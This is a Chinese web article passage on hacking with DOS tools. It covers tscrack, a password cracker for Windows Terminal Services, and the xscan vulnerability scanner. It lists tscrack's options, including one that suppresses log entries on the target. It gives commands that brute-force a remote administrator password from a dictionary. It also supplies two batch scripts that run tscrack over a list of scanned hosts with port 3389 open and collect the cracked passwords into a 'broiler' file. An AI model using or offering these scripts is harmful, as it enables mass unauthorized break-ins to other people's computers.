cmd打开文件夹如上图，我们只要在dos界面中输入各种dos(9)

终端服务密码破解 tscrack:

参数说明

-h 显示使用帮助

-v 显示版本信息

-s 在屏幕上打出解密能力

-b 密码错误时发出的声音

-t 同是发出多个连接（多线程）

-N Prevent System Log entries on targeted server

-U 卸载移除tscrack组件

-f 使用－f后面的密码

-F 间隔时间（频率）

-l 使用－l后面的用户名

-w 使用－w后面的密码字典

-p 使用－p后面的密码

-D 登录主页面

用法示例

tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登陆密码

tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户

@if not exist ipcscan.txt goto noscan

@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i

nscan

@echo 3389.txt no find or scan faild

(①存为3389.bat) （假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)

3389.bat意思是：从3389.txt文件中取一个IP，接着运行hack.bat

@if not exist tscrack.exe goto noscan

@tscrack %1 -l administrator -w pass.dic >>rouji.txt

:noscan

@echo tscrack.exe no find or scan faild

(②存为hack.bat) (运行3389.bat就OK，且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下；就可以等待结果了)

hack.bat意思是：运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码，并将破解结果保存在rouji.txt文件中。

扫描工具：xscan

基本格式

xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息

xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息

检测项目

-active 检测主机是否存活

-os 检测远程操作系统类型（通过NETBIOS和SNMP协议）

-port 检测常用服务的端口状态

-ftp 检测FTP弱口令

-pub 检测FTP服务匿名用户写权限

-pop3 检测POP3-Server弱口令

-smtp 检测SMTP-Server漏洞

-sql 检测SQL-Server弱口令

-smb 检测NT-Server弱口令

-iis 检测IIS编码/解码漏洞

-cgi 检测CGI漏洞

-nasl 加载Nessus攻击脚本

-all 检测以上所有项目

其它选项

-i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取

-l 显示所有网络适配器

-v 显示详细扫描进度

-p 跳过没有响应的主机

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-57848-9.html